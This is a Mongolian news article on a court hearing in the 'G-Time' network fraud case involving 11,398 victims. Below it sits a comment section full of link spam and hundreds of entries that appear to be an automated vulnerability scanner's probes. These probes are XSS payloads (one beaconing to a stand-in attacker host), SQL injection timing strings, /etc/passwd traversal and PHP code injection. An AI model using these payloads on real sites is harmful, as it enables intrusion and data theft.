"Жи Тайм" сүлжээний хэрэгт холбогдох шүүх хурал үргэлжилж байна

Н.Баярмаа / Хууль

11398 иргэнд 25 тэрбум 801 сая 303 мянга 770 төгрөгийн хохирол учруулсан гэх “Жи тайм” сүлжээний хэргийн гэм буруугийн шүүх хуралдаан өнөөдөр 09.00 цагт эхэллээ. Нийслэлийн прокурорын газраас 2015 оны Эрүүгийн хуулийн тусгай ангийн 17.3 дугаар зүйлийн 2 дахь хэсгийн 2.2 дахь заалтад заасан /Залилах / гэмт хэрэгт яллах дүгнэлт үйлдэж ирүүлсэн шүүгдэгч Э.Оюунчимэгт холбогдох эрүүгийн хэргийг Баянгол дүүргийн эрүүгийн хэргийн анхан шатны шүүх 2020 оны тавдугаар сарын 13-ны өдөр хүлээн авсан. Улмаар 2020 оны зургадугаар сарын 23-ны өдрийн урьдчилсан хэлэлцүүлгийн шүүх хуралдаанд шүүгдэгчийн өмгөөлөгч Ч.Шаравнямбуу, шүүгдэгч Э.Оюунчимэг нараас гаргасан хүсэлтийг хэлэлцэхгүй орхиж, анхан шатны шүүх хуралдаанаар уг хүсэлтийг шийдвэрлэхээр болсон.

Улмаар шүүх хуралдааныг 2020 оны долдугаар сарын 8-ны өдөр товлосон ч шүүгдэгчийн өмгөөлөгчдийн хүсэлтээр шүүх хуралдааныг өнөөдрийг хүртэл хойшлуулсан.

“Жи тайм корпорейшн” ХХК-д холбогдох 586 хавтастай 11 мянга 398 хохирогчтой уг хэргийн хохирогчдыг шүүх хуралдааны танхимд бүрэн оролцуулах боломжгүй байгаа ажээ.


Сэтгэгдэл

yzcqwzfgj [117.179.45.1] 2022-05-23 20:12:54

Мэдээ.МН [url=http://www.glvktl1v191281gj8z71v4un7274iyz1s.org/]uyzcqwzfgj[/url] yzcqwzfgj http://www.glvktl1v191281gj8z71v4un7274iyz1s.org/ <a href="http://www.glvktl1v191281gj8z71v4un7274iyz1s.org/">ayzcqwzfgj</a>

csldrgyjnm [182.116.124.220] 2022-04-15 00:50:17

Мэдээ.МН <a href="http://www.g464r06yqdh6qs4aikk20547t71oca96s.org/">acsldrgyjnm</a> csldrgyjnm http://www.g464r06yqdh6qs4aikk20547t71oca96s.org/ [url=http://www.g464r06yqdh6qs4aikk20547t71oca96s.org/]ucsldrgyjnm[/url]

icyytpbdhl [125.46.151.217] 2022-01-07 01:35:23

Мэдээ.МН <a href="http://www.gv4n0k96eefcv4911bmyyg88q265458is.org/">aicyytpbdhl</a> icyytpbdhl http://www.gv4n0k96eefcv4911bmyyg88q265458is.org/ [url=http://www.gv4n0k96eefcv4911bmyyg88q265458is.org/]uicyytpbdhl[/url]

vdzhsvlw [61.163.138.127] 2021-12-29 04:21:24

Мэдээ.МН [url=http://www.gh0l5r60o6c3g3134dkc9q04m1ze2j5cs.org/]uvdzhsvlw[/url] <a href="http://www.gh0l5r60o6c3g3134dkc9q04m1ze2j5cs.org/">avdzhsvlw</a> vdzhsvlw http://www.gh0l5r60o6c3g3134dkc9q04m1ze2j5cs.org/

kzjzqejkgn [116.5.146.175] 2021-09-05 13:41:44

Мэдээ.МН <a href="http://www.g675264pvp41gdw42jar75ho3it802krs.org/">akzjzqejkgn</a> [url=http://www.g675264pvp41gdw42jar75ho3it802krs.org/]ukzjzqejkgn[/url] kzjzqejkgn http://www.g675264pvp41gdw42jar75ho3it802krs.org/

pqmsem [183.27.251.40] 2021-09-03 18:53:00

Мэдээ.МН pqmsem http://www.gi299303fh2920c0euevqpl60t25jwj8s.org/ [url=http://www.gi299303fh2920c0euevqpl60t25jwj8s.org/]upqmsem[/url] <a href="http://www.gi299303fh2920c0euevqpl60t25jwj8s.org/">apqmsem</a>

wfebdlfkh [113.83.194.83] 2021-09-02 09:42:36

Мэдээ.МН <a href="http://www.gq2dh17x83b6xw6r939tg59ic9p6b6b3s.org/">awfebdlfkh</a> wfebdlfkh http://www.gq2dh17x83b6xw6r939tg59ic9p6b6b3s.org/ [url=http://www.gq2dh17x83b6xw6r939tg59ic9p6b6b3s.org/]uwfebdlfkh[/url]

tcriqbej [183.246.71.105] 2021-08-15 16:18:04

Мэдээ.МН <a href="http://www.gu22t87201qmwo935t0k1p5jrhp8g89xs.org/">atcriqbej</a> [url=http://www.gu22t87201qmwo935t0k1p5jrhp8g89xs.org/]utcriqbej[/url] tcriqbej http://www.gu22t87201qmwo935t0k1p5jrhp8g89xs.org/

ckrkyfdno [113.4.118.146] 2021-08-13 17:01:57

Мэдээ.МН ckrkyfdno http://www.g662pto1rs5cso9ow027aaw848q0265is.org/ <a href="http://www.g662pto1rs5cso9ow027aaw848q0265is.org/">ackrkyfdno</a> [url=http://www.g662pto1rs5cso9ow027aaw848q0265is.org/]uckrkyfdno[/url]

ZAP [202.9.40.50] 2021-05-05 05:49:41

ZAP [202.9.40.50] 2021-05-05 05:49:41

lvhrsmlzh [112.252.100.219] 2021-03-24 02:29:49

Мэдээ.МН <a href="http://www.ge6t797y1r1x4x97ci0592sks3qrp8g8s.org/">alvhrsmlzh</a> lvhrsmlzh http://www.ge6t797y1r1x4x97ci0592sks3qrp8g8s.org/ [url=http://www.ge6t797y1r1x4x97ci0592sks3qrp8g8s.org/]ulvhrsmlzh[/url]

gvwkqefir [42.179.199.160] 2021-03-19 21:05:56

Мэдээ.МН gvwkqefir http://www.gsko053y84c434lgy3fnkbjzf8144394s.org/ [url=http://www.gsko053y84c434lgy3fnkbjzf8144394s.org/]ugvwkqefir[/url] <a href="http://www.gsko053y84c434lgy3fnkbjzf8144394s.org/">agvwkqefir</a>

hlzgrjornx [182.151.100.109] 2021-03-05 06:16:38

Мэдээ.МН [url=http://www.grcv59q206zue7503nr3118wuv687msjs.org/]uhlzgrjornx[/url] hlzgrjornx http://www.grcv59q206zue7503nr3118wuv687msjs.org/ <a href="http://www.grcv59q206zue7503nr3118wuv687msjs.org/">ahlzgrjornx</a>

zdtfjwdll [101.64.153.137] 2021-02-25 11:55:03

Мэдээ.МН zdtfjwdll http://www.gnua465b01ta9uvrt0bkc77w0g562383s.org/ <a href="http://www.gnua465b01ta9uvrt0bkc77w0g562383s.org/">azdtfjwdll</a> [url=http://www.gnua465b01ta9uvrt0bkc77w0g562383s.org/]uzdtfjwdll[/url]

vebenkidgt [116.0.1.138] 2021-01-23 01:57:03

Мэдээ.МН <a href="http://www.g87go6s3si14c49wse0a32go6uh897l7s.org/">avebenkidgt</a> [url=http://www.g87go6s3si14c49wse0a32go6uh897l7s.org/]uvebenkidgt[/url] vebenkidgt http://www.g87go6s3si14c49wse0a32go6uh897l7s.org/

drcxkprdd [116.0.1.138] 2021-01-19 05:56:53

Мэдээ.МН drcxkprdd http://www.gmpboad14lhor6l36780tsr1q6645638s.org/ <a href="http://www.gmpboad14lhor6l36780tsr1q6645638s.org/">adrcxkprdd</a> [url=http://www.gmpboad14lhor6l36780tsr1q6645638s.org/]udrcxkprdd[/url]

fjfenpxkb [61.142.20.18] 2021-01-13 00:29:44

Мэдээ.МН [url=http://www.gfp9ke47wv4ne81zchj006009524pm4ds.org/]ufjfenpxkb[/url] <a href="http://www.gfp9ke47wv4ne81zchj006009524pm4ds.org/">afjfenpxkb</a> fjfenpxkb http://www.gfp9ke47wv4ne81zchj006009524pm4ds.org/

thjyvyxycc [116.0.1.138] 2020-12-15 05:42:30

Мэдээ.МН <a href="http://www.g5tl82250ayd3h1l6ajbn7r5hkm95083s.org/">athjyvyxycc</a> thjyvyxycc http://www.g5tl82250ayd3h1l6ajbn7r5hkm95083s.org/ [url=http://www.g5tl82250ayd3h1l6ajbn7r5hkm95083s.org/]uthjyvyxycc[/url]

pmmckxqbh [123.120.196.184] 2020-12-03 09:36:47

Мэдээ.МН pmmckxqbh http://www.g154rtff3iu3gfm8m70xd505f4858y1ds.org/ [url=http://www.g154rtff3iu3gfm8m70xd505f4858y1ds.org/]upmmckxqbh[/url] <a href="http://www.g154rtff3iu3gfm8m70xd505f4858y1ds.org/">apmmckxqbh</a>

eoyqfoivg [106.4.239.30] 2020-11-30 07:10:20

Мэдээ.МН [url=http://www.g6h467x6gj3od9cn3191a4tgi3xr2u51s.org/]ueoyqfoivg[/url] <a href="http://www.g6h467x6gj3od9cn3191a4tgi3xr2u51s.org/">aeoyqfoivg</a> eoyqfoivg http://www.g6h467x6gj3od9cn3191a4tgi3xr2u51s.org/

hifedtsfk [112.115.89.166] 2020-11-29 01:14:51

Мэдээ.МН <a href="http://www.g16u5y85wz6ip8s97079f1o3qj5pf4rfs.org/">ahifedtsfk</a> [url=http://www.g16u5y85wz6ip8s97079f1o3qj5pf4rfs.org/]uhifedtsfk[/url] hifedtsfk http://www.g16u5y85wz6ip8s97079f1o3qj5pf4rfs.org/

nherrpnyrk [113.108.126.21] 2020-11-15 10:55:13

Мэдээ.МН [url=http://www.gnw1k39fz090u701w8sekm52giy8h260s.org/]unherrpnyrk[/url] <a href="http://www.gnw1k39fz090u701w8sekm52giy8h260s.org/">anherrpnyrk</a> nherrpnyrk http://www.gnw1k39fz090u701w8sekm52giy8h260s.org/

xsmqokcvmg [106.87.88.231] 2020-11-13 08:53:17

Мэдээ.МН xsmqokcvmg http://www.gx072g7w5z116t7ybt6xlc9n4ei24k44s.org/ <a href="http://www.gx072g7w5z116t7ybt6xlc9n4ei24k44s.org/">axsmqokcvmg</a> [url=http://www.gx072g7w5z116t7ybt6xlc9n4ei24k44s.org/]uxsmqokcvmg[/url]

nbycioyqq [113.166.195.133] 2020-11-08 05:07:30

Мэдээ.МН [url=http://www.gu0j3drukc99lk57o98477z6wa000u3ws.org/]unbycioyqq[/url] <a href="http://www.gu0j3drukc99lk57o98477z6wa000u3ws.org/">anbycioyqq</a> nbycioyqq http://www.gu0j3drukc99lk57o98477z6wa000u3ws.org/

yqyvlroxyi [182.86.226.126] 2020-11-08 04:29:55

Мэдээ.МН yqyvlroxyi http://www.g5266mdo7w01hy7ox36guk4up144r45gs.org/ <a href="http://www.g5266mdo7w01hy7ox36guk4up144r45gs.org/">ayqyvlroxyi</a> [url=http://www.g5266mdo7w01hy7ox36guk4up144r45gs.org/]uyqyvlroxyi[/url]

pqfovgmn [111.27.38.99] 2020-11-07 08:02:34

Мэдээ.МН <a href="http://www.g69se33fbxe9k7a94r6041owgf8q428ts.org/">apqfovgmn</a> pqfovgmn http://www.g69se33fbxe9k7a94r6041owgf8q428ts.org/ [url=http://www.g69se33fbxe9k7a94r6041owgf8q428ts.org/]upqfovgmn[/url]

ztcrkmbdk [119.126.157.65] 2020-11-03 01:36:41

Мэдээ.МН ztcrkmbdk http://www.gou51ix9aym8s3m2g337qed11kz75987s.org/ [url=http://www.gou51ix9aym8s3m2g337qed11kz75987s.org/]uztcrkmbdk[/url] <a href="http://www.gou51ix9aym8s3m2g337qed11kz75987s.org/">aztcrkmbdk</a>

e [116.113.93.82] 2020-10-28 22:15:16

1

e [116.113.93.82] 2020-10-28 22:15:14

1

e [116.113.93.82] 2020-10-28 22:15:07

1

e [116.113.93.82] 2020-10-28 22:15:01

1<n41ih5<

e [116.113.93.82] 2020-10-28 22:14:56

1<img sRc='http://attacker-9571/log.php?

e [116.113.93.82] 2020-10-28 22:14:53

1<mI2EPX x=9175>

e [116.113.93.82] 2020-10-28 22:14:50

1<ifRAme sRc=9428.com></IfRamE>

e [116.113.93.82] 2020-10-28 22:14:46

1<W4XWO8>SFC19[!+!]</W4XWO8>

e [116.113.93.82] 2020-10-28 22:14:43

1DPnff <ScRiPt >hyyE(9902)</ScRiPt>

e [116.113.93.82] 2020-10-28 22:14:40

1<% contenteditable onresize=hyyE(9590)>

e [116.113.93.82] 2020-10-28 22:14:36

1}body{acu:Expre/**/SSion(hyyE(9809))}

e [116.113.93.82] 2020-10-28 22:14:33

1<img<!-- --> src=x onerror=alert(9352);//><!-- -->

e [116.113.93.82] 2020-10-28 22:14:28

[url=http://www.vulnweb.com][/url]

e [116.113.93.82] 2020-10-28 22:14:25

<a HrEF=jaVaScRiPT:>

e [116.113.93.82] 2020-10-28 22:14:22

<a HrEF=http://www.vulnweb.com></a>

e [116.113.93.82] 2020-10-28 22:14:19

1<input autofocus onfocus=hyyE(9025)>

e [116.113.93.82] 2020-10-28 22:14:16

e [116.113.93.82] 2020-10-28 22:14:14

1<ScRiPt>hyyE(9225)</sCripT>

e [116.113.93.82] 2020-10-28 22:14:10

1\u003CScRiPt\hyyE(9977)\u003C/sCripT\u003E

e [116.113.93.82] 2020-10-28 22:14:05

%31%3C%53%63%52%69%50%74%20%3E%68%79%79%45%289737%29%3C%2F%73%43%72%69%70%54%3E

e [116.113.93.82] 2020-10-28 22:14:02

1<img/src=">" onerror=alert(9318)>

e [116.113.93.82] 2020-10-28 22:13:59

1<img src=xyz OnErRor=hyyE(9460)>

e [116.113.93.82] 2020-10-28 22:13:55

1<img src=//testasp.vulnweb.com/t/dot.gif onload=hyyE(9047)>

e [116.113.93.82] 2020-10-28 22:13:53

1<body onload=hyyE(9162)>

e [116.113.93.82] 2020-10-28 22:13:48

1<iframe src='data:text/html;base64,PHNjcmlwdD5hbGVydCgnYWN1bmV0aXgteHNzLXRlc3QnKTwvc2NyaXB0Pgo=' invalid='9282'>

e [116.113.93.82] 2020-10-28 22:13:45

1<isindex type=image src=1 onerror=hyyE(9516)>

e [116.113.93.82] 2020-10-28 22:13:43

1<svg

e [116.113.93.82] 2020-10-28 22:13:39

1<video><source onerror="javascript:hyyE(9112)">

e [116.113.93.82] 2020-10-28 22:13:36

1<ScRiPt >hyyE(9193)</ScRiPt>

e [116.113.93.82] 2020-10-28 22:13:33

1<ScRiPt/acu src=//testasp.vulnweb.com/t/xss.js?9978></ScRiPt>

e [116.113.93.82] 2020-10-28 22:13:28

1<ScRiPt >hyyE(9809)</ScRiPt>

e [116.113.93.82] 2020-10-28 22:13:25

1<ScR<ScRiPt>IpT>hyyE(9990)</sCr<ScRiPt>IpT>

e [116.113.93.82] 2020-10-28 22:13:21

1<script>hyyE(9190)</script>

e [116.113.93.82] 2020-10-28 22:13:18

1<WXGJS9>HDEYS[!+!]</WXGJS9>

e [116.113.93.82] 2020-10-28 22:13:15

1<ScRiPt >hyyE(9872)</ScRiPt>

e [116.113.93.82] 2020-10-28 22:13:12

{{9999733*10000129}}

e [116.113.93.82] 2020-10-28 22:13:09

acux4756

e [116.113.93.82] 2020-10-28 22:13:06

acu3531<s1﹥s2ʺs3ʹuca3531

e [116.113.93.82] 2020-10-28 22:13:03

19835384

e [116.113.93.82] 2020-10-28 22:13:00

'"()&%<acx><ScRiPt >hyyE(9342)</ScRiPt>

e [116.113.93.82] 2020-10-28 22:12:56

1'"()&%<acx><ScRiPt >hyyE(9051)</ScRiPt>

e [116.113.93.82<RkRl1s<] 2020-10-28 22:12:49

1

e [116.113.93.82<img sRc='http://attacker-9798/log.php?] 2020-10-28 22:12:45

1

e [116.113.93.82<0jlgva x=9331>] 2020-10-28 22:12:41

1

e [116.113.93.82<ifRAme sRc=9108.com></IfRamE>] 2020-10-28 22:12:37

1

e [116.113.93.82<WEJLZP>AZAZ2[!+!]</WEJLZP>] 2020-10-28 22:12:34

1

e [116.113.93.8209SvX <ScRiPt >hyyE(9405)</ScRiPt>] 2020-10-28 22:12:29

1

e [116.113.93.82] 2020-10-28 22:12:27

1

e [116.113.93.82<% contenteditable onresize=hyyE(9961)>] 2020-10-28 22:12:26

1

e [116.113.93.82] 2020-10-28 22:12:26

1

e [116.113.93.82] 2020-10-28 22:12:25

1

e [116.113.93.82] 2020-10-28 22:12:25

1

e [116.113.93.82}body{acu:Expre/**/SSion(hyyE(9604))}] 2020-10-28 22:12:24

1

e [116.113.93.82] 2020-10-28 22:12:23

1

e [116.113.93.82] 2020-10-28 22:12:22

1

e [116.113.93.82<img<!-- --> src=x onerror=alert(9287);//><!-- -->] 2020-10-28 22:12:21

1

e [116.113.93.82] 2020-10-28 22:12:20

1

e [116.113.93.82] 2020-10-28 22:12:18

1

e [116.113.93.82] 2020-10-28 22:12:17

1

e [[url=http://www.vulnweb.com][/url]] 2020-10-28 22:12:17

1

e [116.113.93.82] 2020-10-28 22:12:15

1

e [<a HrEF=jaVaScRiPT:>] 2020-10-28 22:12:15

1

e [116.113.93.82] 2020-10-28 22:12:15

1

e [116.113.93.82] 2020-10-28 22:12:13

1

e [<a HrEF=http://www.vulnweb.com></a>] 2020-10-28 22:12:12

1

e [116.113.93.82] 2020-10-28 22:12:10

1

e [116.113.93.82<input autofocus onfocus=hyyE(9512)>] 2020-10-28 22:12:09

1

e [116.113.93.82] 2020-10-28 22:12:09

1

e [116.113.93.82] 2020-10-28 22:12:08

1

e [116.113.93.82] 2020-10-28 22:12:06

1

e [116.113.93.82] 2020-10-28 22:12:06

1

e [] 2020-10-28 22:12:06

1

e [116.113.93.82] 2020-10-28 22:12:05

1

e [116.113.93.82] 2020-10-28 22:12:04

1

e [116.113.93.82<ScRiPt>hyyE(9408)</sCripT>] 2020-10-28 22:12:03

1

e [116.113.93.82] 2020-10-28 22:12:01

1

e [116.113.93.82\u003CScRiPt\hyyE(9645)\u003C/sCripT\u003E] 2020-10-28 22:11:58

1

e [%31%31%36%2E%31%31%33%2E%39%33%2E%38%32%3C%53%63%52%69%50%74%20%3E%68%79%79%45%289298%29%3C%2F%73%43%72%69%70%54%3E] 2020-10-28 22:11:54

1

e [116.113.93.82] 2020-10-28 22:11:50

1

e [116.113.93.82] 2020-10-28 22:11:49

1

e [116.113.93.82<img/src=">" onerror=alert(9493)>] 2020-10-28 22:11:49

1

e [116.113.93.82] 2020-10-28 22:11:48

1

e [116.113.93.82] 2020-10-28 22:11:47

1

e [116.113.93.82<img src=xyz OnErRor=hyyE(9768)>] 2020-10-28 22:11:45

1

e [116.113.93.82] 2020-10-28 22:11:44

1

e [116.113.93.82] 2020-10-28 22:11:43

1

e [116.113.93.82<img src=//testasp.vulnweb.com/t/dot.gif onload=hyyE(9409)>] 2020-10-28 22:11:42

1

e [116.113.93.82] 2020-10-28 22:11:42

1

e [116.113.93.82] 2020-10-28 22:11:41

1

e [116.113.93.82] 2020-10-28 22:11:39

1

e [116.113.93.82<body onload=hyyE(9736)>] 2020-10-28 22:11:39

1

e [116.113.93.82] 2020-10-28 22:11:38

1

e [116.113.93.82] 2020-10-28 22:11:37

1

e [116.113.93.82] 2020-10-28 22:11:36

1

e [116.113.93.82] 2020-10-28 22:11:35

1

e [116.113.93.82<iframe src='data:text/html;base64,PHNjcmlwdD5hbGVydCgnYWN1bmV0aXgteHNzLXRlc3QnKTwvc2NyaXB0Pgo=' invalid='9367'>] 2020-10-28 22:11:35

1

e [116.113.93.82] 2020-10-28 22:11:34

1

e [116.113.93.82] 2020-10-28 22:11:32

1

e [116.113.93.82<isindex type=image src=1 onerror=hyyE(9653)>] 2020-10-28 22:11:32

1

e [116.113.93.82] 2020-10-28 22:11:31

1

e [116.113.93.82] 2020-10-28 22:11:30

1

e [116.113.93.82] 2020-10-28 22:11:29

1

e [116.113.93.82<svg ] 2020-10-28 22:11:28

1

e [116.113.93.82] 2020-10-28 22:11:27

1

e [116.113.93.82] 2020-10-28 22:11:26

1

e [116.113.93.82<video><source onerror="javascript:hyyE(9261)">] 2020-10-28 22:11:25

1

e [116.113.93.82] 2020-10-28 22:11:25

1

e [116.113.93.82] 2020-10-28 22:11:24

jilDHL83'));select pg_sleep(3); --

e [116.113.93.82<ScRiPt >hyyE(9329)</ScRiPt>] 2020-10-28 22:11:23

1

e [116.113.93.82] 2020-10-28 22:11:22

J6QWXTWe');select pg_sleep(6); --

e [116.113.93.82] 2020-10-28 22:11:20

99EFb5XE');select pg_sleep(3); --

e [116.113.93.82<ScRiPt/acu src=//testasp.vulnweb.com/t/xss.js?9036></ScRiPt>] 2020-10-28 22:11:19

1

e [116.113.93.82] 2020-10-28 22:11:17

MsVp2wmf';select pg_sleep(3); --

e [116.113.93.82] 2020-10-28 22:11:16

-1));select pg_sleep(3); --

e [116.113.93.82] 2020-10-28 22:11:15

-1);select pg_sleep(9); --

e [116.113.93.82<ScRiPt >hyyE(9188)</ScRiPt>] 2020-10-28 22:11:14

1

e [116.113.93.82] 2020-10-28 22:11:14

-1;select pg_sleep(9); --

e [116.113.93.82] 2020-10-28 22:11:13

7QjU4axC'; waitfor delay '0:0:9' --

e [116.113.93.82<ScR<ScRiPt>IpT>hyyE(9252)</sCr<ScRiPt>IpT>] 2020-10-28 22:11:12

1

e [116.113.93.82] 2020-10-28 22:11:11

1 waitfor delay '0:0:9' --

e [116.113.93.82] 2020-10-28 22:11:09

-1); waitfor delay '0:0:9' --

e [116.113.93.82<script>hyyE(9233)</script>] 2020-10-28 22:11:08

1

e [116.113.93.82] 2020-10-28 22:11:08

-1; waitfor delay '0:0:6' --

e [116.113.93.82] 2020-10-28 22:11:07

(select(0)from(select(sleep(6)))v)/*'+(select(0)from(select(sleep(6)))v)+'"+(select(0)from(select(sleep(6)))v)+"*/

e [116.113.93.82] 2020-10-28 22:11:06

1

e [116.113.93.82] 2020-10-28 22:11:05

WEB-INF\web.xml

e [116.113.93.82] 2020-10-28 22:11:05

1

e [116.113.93.82] 2020-10-28 22:11:05

0"XOR(if(now()=sysdate(),sleep(3),0))XOR"Z

e [116.113.93.82] 2020-10-28 22:11:04

WEB-INF/web.xml

e [116.113.93.82] 2020-10-28 22:11:04

1

e [116.113.93.82] 2020-10-28 22:11:04

0'XOR(if(now()=sysdate(),sleep(3),0))XOR'Z

e [116.113.93.82<W3NPHX>VOW6V[!+!]</W3NPHX>] 2020-10-28 22:11:03

1

e [116.113.93.82] 2020-10-28 22:11:03

1

e [116.113.93.82] 2020-10-28 22:11:02

if(now()=sysdate(),sleep(9),0)

e [116.113.93.82] 2020-10-28 22:11:02

/WEB-INF/web.xml

e [116.113.93.82] 2020-10-28 22:11:01

/\../\../\../\../\../\../\../etc/passwd

e [116.113.93.82] 2020-10-28 22:11:00

-1" OR 2+588-588-1=0+0+0+1 --

e [116.113.93.82] 2020-10-28 22:11:00

file:///etc/passwd

e [116.113.93.82<ScRiPt >hyyE(9835)</ScRiPt>] 2020-10-28 22:11:00

1

e [116.113.93.82] 2020-10-28 22:10:59

-1' OR 2+603-603-1=0+0+0+1 or 'khFrkRMN'='

e [116.113.93.82] 2020-10-28 22:10:59

1

e [116.113.93.82] 2020-10-28 22:10:58

invalid../../../../../../../../../../etc/passwd/././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././.

e [116.113.93.82] 2020-10-28 22:10:57

..

e [116.113.93.82] 2020-10-28 22:10:56

-1' OR 2+271-271-1=0+0+0+1 --

e [116.113.93.82] 2020-10-28 22:10:56

../.../.././../.../.././../.../.././../.../.././../.../.././../.../.././etc/passwd

e [116.113.93.82] 2020-10-28 22:10:55

-1 OR 2+321-321-1=0+0+0+1

e [116.113.93.82] 2020-10-28 22:10:55

../..//../..//../..//../..//../..//../..//../..//../..//etc/passwd

e [116.113.93.82] 2020-10-28 22:10:55

-1 OR 2+637-637-1=0+0+0+1 --

e [116.113.93.82] 2020-10-28 22:10:55

/.././.././.././.././.././.././.././../etc/./passwd%00

e [{{10000170*10000165}}] 2020-10-28 22:10:54

1

e [116.113.93.82] 2020-10-28 22:10:54

t7P0O1XS

e [116.113.93.82] 2020-10-28 22:10:53

%2fetc%2fpasswd

e [116.113.93.82] 2020-10-28 22:10:53

1

e [116.113.93.82] 2020-10-28 22:10:52

/etc/passwd

e [116.113.93.82] 2020-10-28 22:10:52

1

e [116.113.93.82] 2020-10-28 22:10:51

.\\./.\\./.\\./.\\./.\\./.\\./etc/passwd

e [116.113.93.82] 2020-10-28 22:10:50

/../..//../..//../..//../..//../..//etc/passwd.jpg

e [acux9527] 2020-10-28 22:10:49

1

e [116.113.93.82] 2020-10-28 22:10:49

..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2Fetc%2Fpasswd%00.jpg

e [116.113.93.82] 2020-10-28 22:10:47

../../../../../../../../../../etc/passwd.jpg

e [116.113.93.82] 2020-10-28 22:10:46

e [116.113.93.82] 2020-10-28 22:10:46

..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2Fetc%2Fpasswd

e [116.113.93.82] 2020-10-28 22:10:45

e [116.113.93.82] 2020-10-28 22:10:45

../../../../../../../../../../../../../../../proc/version

e [acu7665<s1﹥s2ʺs3ʹuca7665] 2020-10-28 22:10:45

1

e [116.113.93.82] 2020-10-28 22:10:45

../../../../../../../../../../etc/passwd

e [116.113.93.82] 2020-10-28 22:10:44

JyI=

e [116.113.93.82] 2020-10-28 22:10:44

1

e [116.113.93.82] 2020-10-28 22:10:43

@@g8nXn

e [116.113.93.82] 2020-10-28 22:10:43

1

e [116.113.93.82] 2020-10-28 22:10:43

1

e [116.113.93.829631536] 2020-10-28 22:10:42

1

e [116.113.93.82] 2020-10-28 22:10:42

1

e [116.113.93.82] 2020-10-28 22:10:42

1

e [116.113.93.82] 2020-10-28 22:10:42

1

e [116.113.93.82] 2020-10-28 22:10:41

1

e [116.113.93.82] 2020-10-28 22:10:40

1

e [116.113.93.82] 2020-10-28 22:10:40

\

e ['"()&%<acx><ScRiPt >hyyE(9174)</ScRiPt>] 2020-10-28 22:10:40

1

e [116.113.93.82] 2020-10-28 22:10:39

1

e [116.113.93.82] 2020-10-28 22:10:38

1

e [116.113.93.82] 2020-10-28 22:10:38

1'"

e [116.113.93.82] 2020-10-28 22:10:38

<!--

e [116.113.93.82] 2020-10-28 22:10:38

1

e [116.113.93.82] 2020-10-28 22:10:37

'"

e [116.113.93.82] 2020-10-28 22:10:35

1

e [116.113.93.82] 2020-10-28 22:10:35

1

e [116.113.93.82] 2020-10-28 22:10:34

create/.

e [116.113.93.82] 2020-10-28 22:10:34

1

e [116.113.93.82] 2020-10-28 22:10:33

1

e [116.113.93.82] 2020-10-28 22:10:33

1

e [116.113.93.82] 2020-10-28 22:10:33

create

e [116.113.93.82] 2020-10-28 22:10:33

1

e [<!--] 2020-10-28 22:10:32

1

e [116.113.93.82'"()&%<acx><ScRiPt >hyyE(9196)</ScRiPt>] 2020-10-28 22:10:32

1

e [116.113.93.82] 2020-10-28 22:10:32

1

e [116.113.93.82] 2020-10-28 22:10:32

${@print(md5(acunetix_wvs_security_test))}\

e [116.113.93.82] 2020-10-28 22:10:32

create

e ['"] 2020-10-28 22:10:31

1

e [116.113.93.82] 2020-10-28 22:10:31

1

e [116.113.93.82] 2020-10-28 22:10:31

/www.vulnweb.com

e [116.113.93.82] 2020-10-28 22:10:31

${@print(md5(acunetix_wvs_security_test))}

e [116.113.93.82] 2020-10-28 22:10:31

1

e [116.113.93.82] 2020-10-28 22:10:30

testasp.vulnweb.com/t/xss.html?%00

e [] 2020-10-28 22:10:30

1

e [116.113.93.82] 2020-10-28 22:10:29

";print(md5(acunetix_wvs_security_test));$a="

e [] 2020-10-28 22:10:29

1

e [116.113.93.82] 2020-10-28 22:10:29

)))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))

e [116.113.93.82] 2020-10-28 22:10:28

http://hit6k1XSFloet.bxss.me/

e [116.113.93.82] 2020-10-28 22:10:28

HttP://testasp.vulnweb.com/t/xss.html?%00

e [116.113.93.82] 2020-10-28 22:10:28

';print(md5(acunetix_wvs_security_test));$a='

e [JyI=] 2020-10-28 22:10:28

1

e [/www.vulnweb.com] 2020-10-28 22:10:27

1

e [create/.] 2020-10-28 22:10:27

1

e [116.113.93.82] 2020-10-28 22:10:26

;print(md5(acunetix_wvs_security_test));

e [)))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))] 2020-10-28 22:10:26

1

e [@@0ecM1] 2020-10-28 22:10:26

1

e [116.113.93.82] 2020-10-28 22:10:26

1

e [1] 2020-10-28 22:10:25

1

e [116.113.93.82] 2020-10-28 22:10:25

1

e [\] 2020-10-28 22:10:25

1

